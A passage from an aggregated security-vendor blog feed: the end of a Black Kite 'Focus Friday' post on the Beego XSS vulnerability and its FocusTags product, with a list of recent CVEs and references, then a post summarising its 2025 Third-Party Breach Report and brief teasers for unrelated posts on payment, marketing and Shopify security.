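}
```

The same hasUnescapedPayload check can be run over values already stored in user-generated fields to answer the stored-data audit question above.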

How TPRM Professionals Can Leverage Black Kite for This Vulnerability

Black Kite published the FocusTag™ for the Beego XSS vulnerability (CVE-2025-30223) on April 11, 2025. This tag identifies vendors whose exposed applications may be using vulnerable versions of the Beego framework. By analyzing HTML source code, script libraries, and domain-level fingerprints, Black Kite provides asset-specific intelligence such as affected subdomains or externally facing interfaces.

With the tag’s VERY HIGH confidence level, TPRM professionals can quickly pinpoint which vendors require immediate outreach. The FocusTag™ streamlines due diligence by narrowing down the scope of concern, enabling organizations to conduct targeted assessments instead of issuing blanket questionnaires.

Black Kite’s Beego FocusTag™ details critical insights on the event for TPRM professionals.

Enhancing TPRM With Black Kite FocusTags™

The rise of exploitable software supply chain vulnerabilities—such as those in Adobe ColdFusion and Beego—demands a smarter, more targeted approach to Third-Party Risk Management. Black Kite’s FocusTags™ deliver that precision by equipping organizations with real-time, asset-level intelligence tied to the latest threats. Here’s how these tags empower TPRM teams:

  • Threat-Centric Vendor Identification: Know exactly which vendors in your ecosystem are affected by vulnerabilities like CVE-2025-30223 or CVE-2025-24447—no guesswork, no overreach.
  • Risk-Based Prioritization: Align vendor outreach efforts with the severity of each threat and the business criticality of the impacted third parties.
  • Actionable Engagement: Conduct targeted conversations with vendors, backed by knowledge of exposed assets, vulnerable software versions, and available patches.
  • Continuous Security Visibility: Access a constantly updated view of your third-party landscape, driven by internet-wide scanning, external intelligence, and contextual enrichment.

FocusTags™ are more than alerts—they are operational tools built to support agile, scalable risk management strategies. Whether responding to deserialization flaws in ColdFusion or XSS vectors in Beego, Black Kite’s platform ensures TPRM professionals are equipped with the right insights, right when they need them.


About Focus Friday

Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.

FocusTags™ in the Last 30 Days:

  • Adobe ColdFusion: CVE-2025-24446, CVE-2025-24447, CVE-2025-30281, CVE-2025-30282, CVE-2025-30284, CVE-2025-30285, CVE-2025-30286, CVE-2025-30287, CVE-2025-30288, CVE-2025-30289, CVE-2025-30290, Deserialization of Untrusted Data, Improper Authentication, Improper Access Control, OS Command Injection, Improper Input Validation, Path Traversal Vulnerabilities in Adobe ColdFusion.
  • Beego: CVE-2025-30223, Reflected/Stored XSS Vulnerabilities in Beego Web Framework.
  • Ivanti Connect Secure: CVE‑2025‑22457, Stack‑based Buffer Overflow Vulnerability in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti ZTA Gateways.
  • FortiSwitch: CVE‑2024‑48887, Unverified Password Change Vulnerability in Fortinet FortiSwitch web interface.
  • MinIO: CVE‑2025‑31489, Improper Verification of Cryptographic Signature Vulnerability in MinIO Go module package.
  • Kubernetes Ingress NGINX: CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974, Improper Isolation or Compartmentalization Vulnerability, Remote Code Execution Vulnerability in Kubernetes ingress-nginx controller.
  • Synology DSM: CVE-2024-10441, Remote Code Execution Vulnerability in Synology BeeStation OS (BSM), Synology DiskStation Manager (DSM).
  • Synapse Server: CVE-2025-30355, Improper Input Validation Vulnerability in Matrix Synapse Server.
  • Juniper Junos OS – Mar2025: CVE-2025-21590, Improper Isolation or Compartmentalization Vulnerability in Juniper Junos OS.
  • SAP NetWeaver – Mar2025: CVE-2017-12637, Directory Traversal Vulnerability in SAP NetWeaver Application Server.
  • MongoDB – Mar2025: CVE-2025-0755, Heap-based Buffer Overflow Vulnerability in MongoDB’s C driver library (libbson).
  • DrayTek Vigor – Mar2025: CVE-2024-41334, CVE-2024-41335, CVE-2024-41336, CVE-2024-41338, CVE-2024-41339, CVE-2024-41340, CVE-2024-51138, CVE-2024-51139, Code Injection Vulnerability, Arbitrary Code Execution Vulnerability, Observable Discrepancy, Sensitive Information Disclosure, Plaintext Storage of a Password, NULL Pointer Dereference, DoS Vulnerability, Unrestricted Upload of File with Dangerous Type, Stack-based Buffer Overflow Vulnerability, Buffer Overflow Vulnerability, Cross-Site Request Forgery (CSRF) Vulnerability in DrayTek Vigor Routers.
  • VMware ESXi – Mar2025: CVE-2025-22224, CVE-2025-22225, CVE-2025-22226, Heap Overflow Vulnerability, TOCTOU Race Condition Vulnerability, Arbitrary Write Vulnerability, Information Disclosure Vulnerability in VMware ESXi.
  • Apache Tomcat – Mar2025: CVE-2025-24813, Remote Code Execution Vulnerability, Information Disclosure and Corruption Vulnerability in Apache Tomcat.

References

  • https://helpx.adobe.com/security/products/coldfusion/apsb25-15.html
  • https://thehackernews.com/2025/04/adobe-patches-11-critical-coldfusion.html
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24446
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24447
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30281
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30282
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30284
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30285
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30286
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30287
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30288
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30289
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30290
  • https://securityonline.info/cve-2025-30223-cvss-9-3-critical-xss-vulnerability-discovered-in-beego-framework
  • https://nvd.nist.gov/vuln/detail/CVE-2025-30223
  • https://github.com/beego/beego/security/advisories/GHSA-2j42-h78h-q4fg
  • https://gist.github.com/thevilledev/8fd0cab3f098320aa9daab04be59fd2b

The post FOCUS FRIDAY: THIRD-PARTY RISKS FROM ADOBE COLDFUSION AND BEEGO XSS VULNERABILITIES appeared first on Black Kite.

Key Takeaways from the 2025 Third-Party Breach Report

13 February 2025 at 11:23

Written by: Ferhat Dikbiyik, Chief Research & Intelligence Officer

Every breach tells a story. In 2024, that story was about third-party vulnerabilities becoming the preferred entry point for attackers. From ransomware attacks that threatened supply chains to credential misuse that compromised entire industries, third-party breaches surged in both scale and sophistication.

Black Kite’s 2025 Third-Party Breach Report takes a deep dive into these incidents, analyzing the most significant third-party breaches of 2024 to identify the key trends shaping the future of cybersecurity. This year’s findings highlight critical shifts in the third-party risk landscape: ransomware affiliates are becoming more aggressive, unauthorized network access remains the most exploited attack vector, and regulatory frameworks are driving improvements — but not evenly across industries.

5 Takeaways from the 2025 Third-Party Breach Report

For cybersecurity leaders looking to adapt their strategies for the year ahead, here are a few notable findings from this year’s report — and what they mean for your approach to third-party risk management.

Read Black Kite’s 2025 Third-Party Breach Report, no download required.

1. A shift to continuous risk monitoring

In 2024, the Cleo File Transfer ransomware attack was a wake-up call that exposed the shortcomings of traditional third-party risk management. Attackers exploited unpatched vulnerabilities in widely used file transfer software, impacting dozens of organizations across industries. Traditional security assessments failed to catch these risks, but proactive monitoring tools could have flagged these vulnerabilities before attackers did.

For too long, third-party risk management (TPRM) has relied on security questionnaires. Organizations track response rates, completion metrics, and compliance checklists — but breaches keep happening. The problem? These assessments measure vendor effort, not actual security posture, and only at a single point in time.

Meanwhile, ransomware groups aren’t wasting time with paperwork. They’re studying supply chains, buying marketing intelligence, and doing everything they can to learn more about their victims and their supply chains. Questionnaires are no defense against this kind of sophisticated, intentional approach. 

Organizations need to move beyond static assessments and embrace real-time risk intelligence to detect vulnerabilities before they’re exploited. Instead of relying solely on vendors’ self-reported security measures, organizations should implement continuous monitoring tools that provide real-time visibility into third-party risks. During the Cleo File Transfer ransomware campaign, for example, Black Kite’s FocusTags™ helped organizations identify at-risk vendors and implement rapid mitigation strategies to prevent further breaches.

2. Affiliates are changing the rules of ransomware

Ransomware operations underwent a major shift in 2024, driven by changes in the underground cybercrime economy. The February attack on Change Healthcare didn’t just impact pharmacies, doctors, and hospitals — it reshaped the entire ransomware market. A payment dispute between an affiliate and a major ransomware group led to a structural change, where affiliates gained greater control and financial incentives. 

This affiliate-led model has fueled a spike in ransomware activity. Now, instead of centralized ransomware groups leading the charge, affiliates are operating with more autonomy, deploying multiple types of ransomware and significantly increasing the frequency of attacks. 

Healthcare bore the brunt of these attacks in 2024, accounting for over 40% of all third-party breaches. And unlike ransomware groups that historically followed an informal “twisted code of conduct” — where healthcare organizations were considered off-limits — modern affiliates have no such boundaries. They prioritize financial gain over all else, choosing targets based on likelihood to pay. The Cencora ransomware attack, for instance, allegedly resulted in a $75 million ransom payment, exposing sensitive patient data and revealing the cascading impact of third-party breaches.

This shift in ransomware tactics means organizations can no longer rely on past attack patterns to predict future threats. With financially motivated affiliates now driving attacks, businesses must invest in tools designed to proactively monitor and manage third-party risks to ensure a rapid response to disruptive events.

3. Regulations are driving cybersecurity improvements

Regulatory frameworks like DORA, HIPAA, and GDPR have been catalysts for critical risk management improvements, particularly in industries with strict compliance mandates. According to our findings, among vendors that experienced a breach and subsequently improved their cyber rating by at least 3 points, 72% serve the healthcare industry — an indication that regulatory enforcement is driving significant improvements in incident response and vendor risk management practices.

However, not all industries are keeping pace. Only 14% of vendors with improved scores following a breach support the financial services sector. Similarly, only 14% of vendors in the manufacturing sector showed progress in enhancing their cyber ratings.

The progress observed in sectors like healthcare, where regulations drove notable improvements, serves as a model for other industries to follow. But regulations aren’t enough on their own either. While regulatory frameworks establish baseline security standards, they must be backed by proactive risk management strategies. Organizations that implement continuous third-party risk monitoring, leverage real-time threat intelligence tools, and enforce vendor accountability through contractual security requirements are significantly better positioned to identify and mitigate emerging threats.

4. Defining unauthorized network access

Unauthorized network access accounted for over 50% of publicly disclosed third-party breaches in 2024. But what does that really mean? Too often, “unauthorized access” is used as a vague, catch-all explanation when organizations lack clarity on the root cause of an attack or choose not to disclose specific details. This makes it difficult to determine whether breaches were caused by stolen credentials, misconfigurations, or unpatched vulnerabilities.

The lack of transparency in incident reporting presents a serious challenge for CISOs. Without a clear picture of how attackers infiltrated a system, security teams struggle to remediate vulnerabilities and prevent future breaches. Instead of driving meaningful improvements, these incidents often fuel blame games and reactive security postures.

Given the sheer volume of breaches attributed to unauthorized access, security leaders must push for deeper analysis and clearer reporting. Creating a culture of transparency in incident reporting can help security teams better understand the root causes of unauthorized network access breaches, enabling more effective prevention strategies.

5. Building a resilient third-party risk management strategy

While we can’t predict exactly what’s next, there’s a lot we can learn from last year’s third-party breaches. By analyzing the trends, cybersecurity leaders can fine-tune their strategies to stay ahead of emerging threats. What’s clear from this year’s 2025 Third-Party Breach Report is that a proactive, collaborative approach to third-party risk management is now essential.

As we move into 2025, relying on reactive measures is no longer enough. Organizations must embrace real-time risk assessments, improve vendor communication using tools like Black Kite Bridge™, and invest in actionable remediation intelligence. Cyber threats are evolving fast, and so must the tools and strategies used to combat them. By adapting to these changes in the third-party risk landscape, companies can build a stronger, more resilient security posture and better protect themselves against the next wave of cyber threats.

Dig into our full 2025 Third Party Breach Report: The Silent Breach: How Third Parties Became the Biggest Cyber Threat in 2024 – accessible instantly, no download required.

The post Key Takeaways from the 2025 Third-Party Breach Report appeared first on Black Kite.

Protecting Your Payment Information When Purchasing Growth Services

13 February 2025 at 03:33

In today's digital landscape, purchasing growth services for social media and online marketing is a common practice. However, ensuring secure transactions and protecting sensitive payment information is crucial. In this comprehensive guide, we will outline best practices to safeguard your financial data, highlight secure payment methods, and discuss how to avoid credit card fraud and chargeback scams.

Marketing to CISOs: Strategies to Reach Cybersecurity Decision-Makers

13 February 2025 at 03:12

Landing on the Chief Information Security Officer (CISO) desk is the holy grail for any cybersecurity marketing strategy. CISOs control million-dollar technology budgets and determine enterprise platform priorities which are highly sought after by sales teams. However, the cold, hard truth is that these influential security leaders remain largely unreachable behind a fortress of gatekeepers, outdated perceptions, and overcrowded inboxes.

How to Secure Your Shopify Store: A Proven Data Protection Guide

12 February 2025 at 08:20

Automated software attacks targeted 62% of eCommerce stores in 2022. These numbers show why online merchants now take Shopify cyber security seriously.

Online stores, especially Shopify platforms, must protect their customers' sensitive data from breaches and unauthorised access. The good news is that Shopify maintains PCI DSS Level 1 compliance, the highest security standard for payment processing. The platform's built-in fraud detection tools analyze every transaction to identify potential risks.
